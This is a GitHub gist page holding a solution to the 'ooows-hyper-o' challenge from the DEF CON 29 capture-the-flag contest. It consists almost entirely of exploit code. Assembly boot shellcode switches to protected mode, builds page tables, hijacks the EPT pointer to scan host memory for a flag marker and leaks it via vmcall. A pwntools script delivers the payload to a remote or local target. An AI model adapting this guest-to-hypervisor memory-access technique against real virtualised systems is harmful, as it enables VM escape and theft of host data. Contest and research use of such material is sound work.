-
-
Save elnx/3c568db706bf1c27299ac53907ff6c62 to your computer and use it in GitHub Desktop.
solution to ooows-hyper-o in DC29CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; nasm -fbin sc.asm -o sc | |
; some code from https://github.com/gamozolabs/chocolate_milk | |
[org 0xf000] | |
[bits 16] | |
entry: | |
; Disable interrupts and clear direction flag | |
cli | |
cld | |
mov ecx, 0x1000 | |
mov edx, 0xf000 | |
self_copy: | |
mov al, [cs:edx] | |
mov [ds:edx], al | |
inc edx | |
loop self_copy | |
; Set the A20 line | |
; in al, 0x92 | |
; or al, 2 | |
; out 0x92, al | |
; Clear DS | |
xor ax, ax | |
mov ds, ax | |
; Load a 32-bit GDT | |
lgdt [gdt] | |
; Enable protected mode | |
mov eax, cr0 | |
or eax, (1 << 0) | |
mov cr0, eax | |
; Transition to 32-bit mode by setting CS to a protected mode selector | |
jmp 0x0018:pm_entry | |
[bits 32] | |
pm_entry: | |
; Set up all data selectors | |
mov ax, 0x20 | |
mov es, ax | |
mov ds, ax | |
mov fs, ax | |
mov gs, ax | |
mov ss, ax | |
mov esp, 0x8000 | |
mov dword [0], 0x3d000000+0x1000+7 | |
mov dword [0+0x1000], 0x3d000000+0x2000+7 | |
mov dword [0+0x2000], 0x3d000000+0x3000+7 | |
; code | |
mov dword [0+0x3000+0xff*8], 0x3d000000+0xff000+0x477 | |
mov dword [0+0x3000+0xf*8], 0x3d000000+0xf000+0x477 | |
; stack | |
mov dword [0+0x3000+8*8], 0x3d000000+0x8000+0x477 | |
; pde | |
mov dword [0+0x3000+3*8], 0x3d000000+0x3000+0x477 | |
; hijack eptp | |
mov dword [0x200000], 0x3d00005e | |
cpuid | |
mov edi, 0x10000 | |
or edi, 0x477 | |
loop: | |
mov dword [0+0x3000+4*8], edi | |
cpuid | |
mov eax, [0x4000] | |
and eax, 0xffffff | |
cmp eax, 0x303030 | |
je found | |
add edi, 0x10000 | |
cmp edi, 0x40000000+0x477 | |
jae fail | |
jmp loop | |
found: | |
mov eax, [0x4000] | |
mov ebx, [0x4000+4] | |
mov ecx, [0x4000+4*2] | |
mov edx, [0x4000+4*3] | |
mov esi, [0x4000+4*4] | |
mov edi, [0x4000+4*5] | |
vmcall | |
fail: | |
hlt | |
align 8 | |
gdt_base: | |
dq 0x0000000000000000 ; 0x0000 | Null descriptor | |
dq 0x00009a007c00ffff ; 0x0008 | 16-bit, present, code, base 0x7c00 | |
dq 0x000092000000ffff ; 0x0010 | 16-bit, present, data, base 0 | |
dq 0x00cf9a000000ffff ; 0x0018 | 32-bit, present, code, base 0 | |
dq 0x00cf92000000ffff ; 0x0020 | 32-bit, present, data, base 0 | |
dq 0x00209a0000000000 ; 0x0028 | 64-bit, present, code, base 0 | |
dq 0x0000920000000000 ; 0x0030 | 64-bit, present, data, base 0 | |
gdt: | |
dw (gdt - gdt_base) - 1 | |
dd gdt_base | |
times 0x1fe - ($ - $$) db 0 | |
db 0x55, 0xaa | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
from pwn import * | |
import os | |
import sys | |
context.log_level = 'info' | |
def exploit(r): | |
r.recvuntil('#mmm" #mmmmm') | |
payload = read('sc.o') | |
packet = '' | |
for i in payload: | |
packet += '\x16' + i | |
r.sendline(packet) | |
r.interactive() | |
if __name__ == '__main__': | |
if len(sys.argv) > 2: | |
r = remote(sys.argv[1], int(sys.argv[2])) | |
else: | |
r = process('./%s' % (sys.argv[1])) | |
exploit(r) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment